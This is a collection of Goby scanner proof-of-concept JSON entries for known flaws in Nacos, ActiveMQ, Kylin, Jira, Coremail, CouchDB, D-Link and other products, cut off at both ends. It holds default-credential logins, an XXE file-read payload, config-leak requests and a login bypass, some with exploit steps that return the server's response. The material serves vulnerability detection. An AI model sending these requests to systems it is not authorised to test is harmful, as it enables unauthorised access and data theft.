"window.parent.$(\"#tabLogo\")", 61 | "bz": "" 62 | } 63 | ] 64 | }, 65 | "SetVariable": [ 66 | "output|lastbody|regex|" 67 | ] 68 | } 69 | ], 70 | "PostTime": "2021-11-30 20:01:22", 71 | "GobyVersion": "1.9.310" 72 | } -------------------------------------------------------------------------------- /json/Alibaba Nacos 控制台默认弱口令.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Alibaba Nacos 控制台默认弱口令", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "(title=\"Nacos\" || title=\"HTTP Status 404 – Not Found\" || port=\"8848\") ", 8 | "Description": "Alibaba Nacos 控制台存在默认弱口令 nacos/nacos,可登录后台查看敏感信息", 9 | "Product": "Alibaba Nacos", 10 | "Homepage": "https://github.com/alibaba/nacos", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "OR", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/nacos/v1/auth/users/login", 23 | "follow_redirect": false, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "username=nacos&password=nacos" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | } 41 | ] 42 | }, 43 | "SetVariable": [] 44 | }, 45 | { 46 | "Request": { 47 | "method": "POST", 48 | "uri": "/v1/auth/users/login", 49 | "follow_redirect": true, 50 | "header": { 51 | "Content-Type": "application/x-www-form-urlencoded" 52 | }, 53 | "data_type": "text", 54 | "data": "username=nacos&password=nacos" 55 | }, 56 | "ResponseTest": { 57 | "type": "group", 58 | "operation": "AND", 59 | "checks": [ 60 | { 61 | "type": "item", 62 | "variable": "$code", 63 | "operation": "==", 64 | "value": "200", 65 | "bz": "" 66 | } 67 | ] 68 | }, 69 | "SetVariable": [] 70 | } 71 | ], 72 | "PostTime": "2021-01-25 15:46:58", 73 | "GobyVersion": "1.8.237" 74 | } -------------------------------------------------------------------------------- /json/Apache ActiveMQ Console控制台弱口令.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache ActiveMQ Console控制台弱口令", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "app=\"Apache-ActiveMQ\"", 8 | "Description": "Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用", 9 | "Product": "Apache ActiveMQ", 10 | "Homepage": "http://activemq.apache.org/", 11 | "Author": "PeiQi", 12 | "Impact": "

咩咩咩🐑

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/admin", 23 | "follow_redirect": true, 24 | "header": { 25 | "Authorization": "Basic YWRtaW46YWRtaW4=" 26 | }, 27 | "data_type": "text", 28 | "data": "" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "Version", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-01-21 22:11:54", 54 | "GobyVersion": "1.8.237" 55 | } -------------------------------------------------------------------------------- /json/Apache Cocoon Xml 注入 CVE-2020-11991.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Cocoon Xml 注入 CVE-2020-11991", 3 | "Level": "1", 4 | "Tags": [ 5 | "XML注入" 6 | ], 7 | "GobyQuery": "app=\"Apache-Cocoon\"", 8 | "Description": "9月11日 Apache 软件基金会发布安全公告,修复了 Apache Cocoon xml外部实体注入漏洞(CVE-2020-11991)。\n\nApache Cocoon 是一个基于 Spring 框架的围绕分离理念建立的构架,在这种框架下的所有处理都被预先定义好的处理组件线性连接起来,能够将输入和产生的输出按照流水线顺序处理。用户群:Apache Lenya、Daisy CMS、Hippo CMS、Mindquarry等等,Apache Cocoon 通常被作为一个数据抽取、转换、加载工具或者是系统之间传输数据的中转站。CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。\n\nApache Cocoon <= 2.1.12", 9 | "Product": "Apache Cocoon", 10 | "Homepage": "http://cocoon.apache.org/2.1/", 11 | "Author": "PeiQi", 12 | "Impact": "

咩咩咩🐑

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/v2/api/product/manger/getInfo", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-type": "text/xml" 26 | }, 27 | "data_type": "text", 28 | "data": "\n ]>\n\nJohn \n&ent;\n" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "root", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-01-22 22:24:01", 54 | "GobyVersion": "1.8.237" 55 | } -------------------------------------------------------------------------------- /json/Apache Kylin Console 控制台弱口令.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Kylin Console 控制台弱口令", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "app=\"APACHE-kylin\"", 8 | "Description": "Apache Kylin Console 控制台存在默认弱口令 admin:KYLIN,可被登录控制台进一步利用其他漏洞", 9 | "Product": "Apache Kylin", 10 | "Homepage": "http://kylin.apache.org/", 11 | "Author": "PeiQi", 12 | "Impact": "

咩咩咩🐏

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/kylin/api/user/authentication", 24 | "follow_redirect": true, 25 | "header": { 26 | "Authorization": "Basic YWRtaW46S1lMSU4=", 27 | "Cookie": "project=null" 28 | }, 29 | "data_type": "text", 30 | "data": "" 31 | }, 32 | "ResponseTest": { 33 | "type": "group", 34 | "operation": "AND", 35 | "checks": [ 36 | { 37 | "type": "item", 38 | "variable": "$code", 39 | "operation": "==", 40 | "value": "200", 41 | "bz": "" 42 | }, 43 | { 44 | "type": "item", 45 | "variable": "$code", 46 | "operation": "!=", 47 | "value": "401", 48 | "bz": "" 49 | } 50 | ] 51 | }, 52 | "SetVariable": [] 53 | } 54 | ], 55 | "ExploitSteps": [ 56 | "AND", 57 | { 58 | "Request": { 59 | "method": "GET", 60 | "uri": "/kylin/api/user/authentication", 61 | "follow_redirect": true, 62 | "header": { 63 | "Authorization": "Basic YWRtaW46S1lMSU4=", 64 | "Cookie": "project=null" 65 | }, 66 | "data_type": "text", 67 | "data": "" 68 | }, 69 | "SetVariable": [ 70 | "output|lastbody" 71 | ] 72 | } 73 | ], 74 | "PostTime": "2021-01-24 13:23:42", 75 | "GobyVersion": "1.8.237" 76 | } -------------------------------------------------------------------------------- /json/Apache Kylin 未授权配置泄露 CVE-2020-13937.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Kylin 未授权配置泄露 CVE-2020-13937", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"APACHE-kylin\"", 8 | "Description": "Apache Kylin有一个restful api会在没有任何认证的情况下暴露配置信息。\nhttp://xxx.xxx.xxx.xxx/kylin/api/admin/config\n\nApahche Kylin 2.x.x\nApahche Kylin <= 3.1.0\nApahche Kylin 4.0.0-alpha", 9 | "Product": "Apache Kylin", 10 | "Homepage": "http://kylin.apache.org/cn/", 11 | "Author": "PeiQi", 12 | "Impact": "

咩咩咩🐏

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ExpParams": [ 19 | { 20 | "name": "Config", 21 | "type": "select", 22 | "value": "/kylin/api/admin/config", 23 | "show": "" 24 | } 25 | ], 26 | "ScanSteps": [ 27 | "AND", 28 | { 29 | "Request": { 30 | "method": "GET", 31 | "uri": "/kylin/api/admin/config", 32 | "follow_redirect": true, 33 | "header": {}, 34 | "data_type": "text", 35 | "data": "" 36 | }, 37 | "ResponseTest": { 38 | "type": "group", 39 | "operation": "AND", 40 | "checks": [ 41 | { 42 | "type": "item", 43 | "variable": "$code", 44 | "operation": "==", 45 | "value": "200", 46 | "bz": "" 47 | }, 48 | { 49 | "type": "item", 50 | "variable": "$body", 51 | "operation": "contains", 52 | "value": "config", 53 | "bz": "" 54 | } 55 | ] 56 | }, 57 | "SetVariable": [] 58 | } 59 | ], 60 | "ExploitSteps": [ 61 | "AND", 62 | { 63 | "Request": { 64 | "method": "GET", 65 | "uri": "/kylin/api/admin/config", 66 | "follow_redirect": true, 67 | "header": {}, 68 | "data_type": "text", 69 | "data": "" 70 | }, 71 | "SetVariable": [ 72 | "output|lastbody" 73 | ] 74 | } 75 | ], 76 | "PostTime": "2021-01-24 13:03:37", 77 | "GobyVersion": "1.8.237" 78 | } -------------------------------------------------------------------------------- /json/Apache_ActiveMQ_Console_Weak_Password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache ActiveMQ_Console Weak Password", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "app=\"Apache-ActiveMQ\"", 8 | "Description": "Apache ActiveMQ Console 存在默认弱口令 admin:admin,进入控制台后可被进一步恶意利用", 9 | "Product": "Apache ActiveMQ", 10 | "Homepage": "http://activemq.apache.org/", 11 | "Author": "PeiQi", 12 | "Impact": "

咩咩咩🐑

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/admin", 23 | "follow_redirect": true, 24 | "header": { 25 | "Authorization": "Basic YWRtaW46YWRtaW4=" 26 | }, 27 | "data_type": "text", 28 | "data": "" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "contains", 45 | "value": "Version", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-01-21 22:11:54", 54 | "GobyVersion": "1.8.230" 55 | } -------------------------------------------------------------------------------- /json/Apache_Airflow_Unauthorized.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Airflow Unauthorized", 3 | "Level": "3", 4 | "Tags": [ 5 | "Unauthorized" 6 | ], 7 | "GobyQuery": "app=\"APACHE-Airflow\"", 8 | "Description": "remote attacker to gain unauthorized access to a targeted system", 9 | "Product": "APACHE-Airflow", 10 | "Homepage": "https://airflow.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs

", 13 | "Recommendation": "", 14 | "References": [], 15 | "HasExp": false, 16 | "ExpParams": null, 17 | "ExpTips": { 18 | "Type": "", 19 | "Content": "" 20 | }, 21 | "ScanSteps": [ 22 | "AND", 23 | { 24 | "Request": { 25 | "method": "GET", 26 | "uri": "/admin/", 27 | "follow_redirect": true, 28 | "header": null, 29 | "data_type": "text", 30 | "data": "", 31 | "set_variable": [] 32 | }, 33 | "ResponseTest": { 34 | "type": "group", 35 | "operation": "AND", 36 | "checks": [ 37 | { 38 | "type": "item", 39 | "variable": "$code", 40 | "operation": "==", 41 | "value": "200", 42 | "bz": "" 43 | }, 44 | { 45 | "type": "item", 46 | "variable": "$body", 47 | "operation": "contains", 48 | "value": "Airflow - DAGs", 49 | "bz": "" 50 | }, 51 | { 52 | "type": "item", 53 | "variable": "$body", 54 | "operation": "contains", 55 | "value": "DAGs", 56 | "bz": "" 57 | } 58 | ] 59 | }, 60 | "SetVariable": [ 61 | "output|lastbody|regex|" 62 | ] 63 | } 64 | ], 65 | "PostTime": "2021-10-31 15:32:53", 66 | "GobyVersion": "1.8.302" 67 | } -------------------------------------------------------------------------------- /json/Apache_Kylin_Console_Default_password.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Apache Kylin Console Default password", 3 | "Level": "1", 4 | "Tags": [ 5 | "Default password" 6 | ], 7 | "GobyQuery": "app=\"APACHE-kylin\"", 8 | "Description": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console", 9 | "Product": "Apache Kylin", 10 | "Homepage": "http://kylin.apache.org/", 11 | "Author": "PeiQi", 12 | "Impact": "

The attacker will log into the background as an administrator to further attack

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/kylin/api/user/authentication", 23 | "follow_redirect": true, 24 | "header": { 25 | "Authorization": "Basic YWRtaW46S1lMSU4=", 26 | "Cookie": "project=null" 27 | }, 28 | "data_type": "text", 29 | "data": "" 30 | }, 31 | "ResponseTest": { 32 | "type": "group", 33 | "operation": "AND", 34 | "checks": [ 35 | { 36 | "type": "item", 37 | "variable": "$code", 38 | "operation": "==", 39 | "value": "200", 40 | "bz": "" 41 | }, 42 | { 43 | "type": "item", 44 | "variable": "$code", 45 | "operation": "!=", 46 | "value": "401", 47 | "bz": "" 48 | } 49 | ] 50 | }, 51 | "SetVariable": [] 52 | } 53 | ], 54 | "PostTime": "2021-04-04 15:51:21", 55 | "GobyVersion": "1.8.255" 56 | } -------------------------------------------------------------------------------- /json/Atlassian Jira 信息泄露漏洞 CVE-2020-14181.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Atlassian Jira 信息泄露漏洞 CVE-2020-14181", 3 | "Level": "0", 4 | "Tags": [], 5 | "GobyQuery": "(app=\"JIRA\" || title=\"System Dashboard\")", 6 | "Description": "Jira存在一个未授权访问漏洞,未授权的用户可以通过一个api接口直接查询到某用户名的存在情况,该接口不同于CVE-2019-8446和CVE-2019-3403的接口,是一个新的接口。如果Jira暴露在公网中,未授权用户就可以直接访问该接口爆破出潜在的用户名。", 7 | "Product": "Jira", 8 | "Homepage": "https://ones.ai/", 9 | "Author": "PeiQi", 10 | "Impact": "

🐏

", 11 | "Recommandation": "", 12 | "References": [ 13 | "http://wiki.peiqi.tech" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/secure/ViewUserHover.jspa?username=peiqipeiqipeiqi", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "200", 35 | "bz": "" 36 | }, 37 | { 38 | "type": "item", 39 | "variable": "$body", 40 | "operation": "contains", 41 | "value": "peiqipeiqipeiqi", 42 | "bz": "" 43 | } 44 | ] 45 | }, 46 | "SetVariable": [] 47 | } 48 | ], 49 | "PostTime": "2021-01-29 10:56:59", 50 | "GobyVersion": "1.8.237" 51 | } -------------------------------------------------------------------------------- /json/Atlassian_Jira_user_information_disclosure.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Atlassian Jira user information disclosure (CVE-2020-14181)", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "(app=\"JIRA\" || title=\"System Dashboard\")", 8 | "Description": "There is an unauthorized access vulnerability in JIRA. Unauthorized users can directly query the existence of a user name through an API interface. This interface is different from cve-2019-8446 and cve-2019-3403. It is a new interface. If JIRA is exposed to the public network, unauthorized users can directly access the interface", 9 | "Product": "Atlassian Jira", 10 | "Homepage": "https://pingcode.com/", 11 | "Author": "PeiQi", 12 | "Impact": "

Can be blasted user name, know the correct user name

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/secure/ViewUserHover.jspa?username=peiqipeiqipeiqi", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "peiqipeiqipeiqi", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-04 20:57:19", 52 | "GobyVersion": "1.8.255" 53 | } -------------------------------------------------------------------------------- /json/CVE_2018_19367_.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Portainer为创建用户导致未授权访问(CVE-2018-19367)", 3 | "Level": "2", 4 | "Tags": [], 5 | "GobyQuery": "title=Portainer", 6 | "Description": "Portainer是一款用于管理Docker环境和Docker主机的轻量级用户管理界面。 Portainer 1.19.2及之前版本中存在安全漏洞,该漏洞源于在管理员未被创建时,用于验证的API端点会返回404,而管理员已被创建时,则会返回204。攻击者可利用该漏洞在主机上获取未授权的访问权限。", 7 | "Product": "Portainer", 8 | "Homepage": "https://portainer.io/", 9 | "Author": "k3vi_07@icloud.com", 10 | "Impact": "

Portainer是一款用于管理Docker环境和Docker主机的轻量级用户管理界面。 Portainer 1.19.2及之前版本中存在安全漏洞,该漏洞源于在管理员未被创建时,用于验证的API端点会返回404,而管理员已被创建时,则会返回204。攻击者可利用该漏洞在主机上获取未授权的访问权限。

", 11 | "Recommandation": "

undefined

", 12 | "References": [ 13 | "https://github.com/lichti/shodan-portainer/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/api/users/admin/check", 21 | "follow_redirect": true, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$code", 33 | "operation": "==", 34 | "value": "404", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-03-20 12:49:52", 43 | "GobyVersion": "1.8.255" 44 | } -------------------------------------------------------------------------------- /json/China_Mobile_Yu_Routing_Sensitive_Information_Leaks_Vulnerability.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "中国移动 禹路由 敏感信息泄露漏洞", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"中移\"", 6 | "Description": "中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "luckying", 10 | "Impact": "", 11 | "Recommandation": "

undefined

", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/cgi-bin/ExportSettings.sh", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$body", 33 | "operation": "contains", 34 | "value": "Password", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-06-29 17:19:25", 43 | "GobyVersion": "1.8.268" 44 | } -------------------------------------------------------------------------------- /json/China_Mobile_Yu_routed_the_login_bypass.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "中国移动 禹路由 登录绕过", 3 | "Level": "3", 4 | "Tags": [], 5 | "GobyQuery": "body=\"中移\"", 6 | "Description": "", 7 | "Product": "", 8 | "Homepage": "https://gobies.org/", 9 | "Author": "luckying", 10 | "Impact": "", 11 | "Recommandation": "

undefined

", 12 | "References": [ 13 | "https://gobies.org/" 14 | ], 15 | "ScanSteps": [ 16 | "AND", 17 | { 18 | "Request": { 19 | "method": "GET", 20 | "uri": "/simple-index.asp", 21 | "follow_redirect": false, 22 | "header": {}, 23 | "data_type": "text", 24 | "data": "" 25 | }, 26 | "ResponseTest": { 27 | "type": "group", 28 | "operation": "AND", 29 | "checks": [ 30 | { 31 | "type": "item", 32 | "variable": "$body", 33 | "operation": "contains", 34 | "value": "无线密码", 35 | "bz": "" 36 | } 37 | ] 38 | }, 39 | "SetVariable": [] 40 | } 41 | ], 42 | "PostTime": "2021-06-29 17:19:37", 43 | "GobyVersion": "1.8.268" 44 | } -------------------------------------------------------------------------------- /json/Consul_Rexec_RCE.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Consul Rexec RCE", 3 | "Level": "3", 4 | "Tags": [ 5 | "rce" 6 | ], 7 | "GobyQuery": "protocol=\"consul(http)\"", 8 | "Description": "Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request", 9 | "Product": "Consul", 10 | "Homepage": "https://www.consul.io/", 11 | "Author": "aetkrad", 12 | "Impact": "", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.exploit-db.com/exploits/46073" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/v1/agent/self", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "\"DisableRemoteExec\":false", 51 | "bz": "" 52 | } 53 | ] 54 | }, 55 | "SetVariable": [ 56 | "output|lastbody|regex|" 57 | ] 58 | } 59 | ], 60 | "PostTime": "2021-11-08 21:46:25", 61 | "GobyVersion": "1.8.302" 62 | } -------------------------------------------------------------------------------- /json/Coremail_configuration_information_disclosure.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Coremail configuration information disclosure", 3 | "Level": "0", 4 | "Tags": [ 5 | "Disclosure of Sensitive Information" 6 | ], 7 | "GobyQuery": "app=\"Coremail\"", 8 | "Description": "There is a configuration information leakage vulnerability in an interface of COREMAIL, including port, configuration information, etc", 9 | "Product": "Coremail", 10 | "Homepage": "https://www.coremail.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "

There is a configuration information leakage vulnerability in an interface of COREMAIL, including port, configuration information, etc

", 13 | "Recommandation": "

undefined

", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "GET", 22 | "uri": "/mailsms/s?func=ADMIN:appState&dumpConfig=/", 23 | "follow_redirect": false, 24 | "header": {}, 25 | "data_type": "text", 26 | "data": "" 27 | }, 28 | "ResponseTest": { 29 | "type": "group", 30 | "operation": "AND", 31 | "checks": [ 32 | { 33 | "type": "item", 34 | "variable": "$code", 35 | "operation": "==", 36 | "value": "200", 37 | "bz": "" 38 | }, 39 | { 40 | "type": "item", 41 | "variable": "$body", 42 | "operation": "contains", 43 | "value": "configHome", 44 | "bz": "" 45 | } 46 | ] 47 | }, 48 | "SetVariable": [] 49 | } 50 | ], 51 | "PostTime": "2021-04-14 20:51:04", 52 | "GobyVersion": "1.8.258" 53 | } -------------------------------------------------------------------------------- /json/Couchdb_Unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "Couchdb Unauth", 3 | "Level": "3", 4 | "Tags": [ 5 | "unauth" 6 | ], 7 | "GobyQuery": "app=\"APACHE-CouchDB\"", 8 | "Description": "remote attacker to gain unauthorized access to a targeted system", 9 | "Product": "APACHE-CouchDB", 10 | "Homepage": "http://couchdb.apache.org/", 11 | "Author": "aetkrad", 12 | "Impact": "

Allows remote attackers to execute arbitrary code

", 13 | "Recommendation": "", 14 | "References": [ 15 | "https://www.seebug.org/vuldb/ssvid-91597" 16 | ], 17 | "HasExp": false, 18 | "ExpParams": null, 19 | "ExpTips": { 20 | "Type": "", 21 | "Content": "" 22 | }, 23 | "ScanSteps": [ 24 | "AND", 25 | { 26 | "Request": { 27 | "method": "GET", 28 | "uri": "/_config", 29 | "follow_redirect": false, 30 | "header": null, 31 | "data_type": "text", 32 | "data": "", 33 | "set_variable": [] 34 | }, 35 | "ResponseTest": { 36 | "type": "group", 37 | "operation": "AND", 38 | "checks": [ 39 | { 40 | "type": "item", 41 | "variable": "$code", 42 | "operation": "==", 43 | "value": "200", 44 | "bz": "" 45 | }, 46 | { 47 | "type": "item", 48 | "variable": "$body", 49 | "operation": "contains", 50 | "value": "httpd_design_handlers", 51 | "bz": "" 52 | }, 53 | { 54 | "type": "item", 55 | "variable": "$body", 56 | "operation": "contains", 57 | "value": "external_manager", 58 | "bz": "" 59 | }, 60 | { 61 | "type": "item", 62 | "variable": "$body", 63 | "operation": "contains", 64 | "value": "replicator_manager", 65 | "bz": "" 66 | } 67 | ] 68 | }, 69 | "SetVariable": [ 70 | "output|lastbody|regex|" 71 | ] 72 | } 73 | ], 74 | "PostTime": "2021-11-10 20:27:45", 75 | "GobyVersion": "1.8.302" 76 | } -------------------------------------------------------------------------------- /json/D-Link AC集中管理系统默认弱口令.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "D-Link AC集中管理系统默认弱口令", 3 | "Level": "2", 4 | "Tags": [ 5 | "弱口令" 6 | ], 7 | "GobyQuery": "title=\"AC集中管理平台\" && body=\"D-Link路由器管理页\" && app=\"DLink-Router\"", 8 | "Description": "D-Link AC管理系统存在默认账号密码,可被获取敏感信息", 9 | "Product": "D-Link AC管理系统", 10 | "Homepage": "http://www.dlink.com.cn/", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

", 13 | "Recommandation": "", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "ScanSteps": [ 18 | "AND", 19 | { 20 | "Request": { 21 | "method": "POST", 22 | "uri": "/login.cgi", 23 | "follow_redirect": true, 24 | "header": { 25 | "Content-Type": "application/x-www-form-urlencoded" 26 | }, 27 | "data_type": "text", 28 | "data": "user=admin&password=admin" 29 | }, 30 | "ResponseTest": { 31 | "type": "group", 32 | "operation": "AND", 33 | "checks": [ 34 | { 35 | "type": "item", 36 | "variable": "$code", 37 | "operation": "==", 38 | "value": "200", 39 | "bz": "" 40 | }, 41 | { 42 | "type": "item", 43 | "variable": "$body", 44 | "operation": "not contains", 45 | "value": "flag=0", 46 | "bz": "" 47 | } 48 | ] 49 | }, 50 | "SetVariable": [] 51 | } 52 | ], 53 | "PostTime": "2021-02-07 23:13:20", 54 | "GobyVersion": "1.8.237" 55 | } -------------------------------------------------------------------------------- /json/D-Link DCS系列监控 CNVD-2020-25078.json: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "D-Link DCS系列监控 账号密码信息泄露漏洞 CNVD-2020-25078", 3 | "Level": "1", 4 | "Tags": [ 5 | "账号密码泄露" 6 | ], 7 | "GobyQuery": "(app=\"DLink-Network-Camera\" || title=\"Document Error: Unauthorized\")", 8 | "Description": "D-Link DCS系列监控 通过访问特定的URL得到账号密码信息,攻击者通过漏洞进入后台可以获取视频监控页面", 9 | "Product": "DCS-2530L DCS-2670L DCS-4603 DCS-4622 DCS-4701E DCS-4703E DCS-4705E DCS-4802E DCS-P703", 10 | "Homepage": "PeiQi", 11 | "Author": "PeiQi", 12 | "Impact": "

🐏

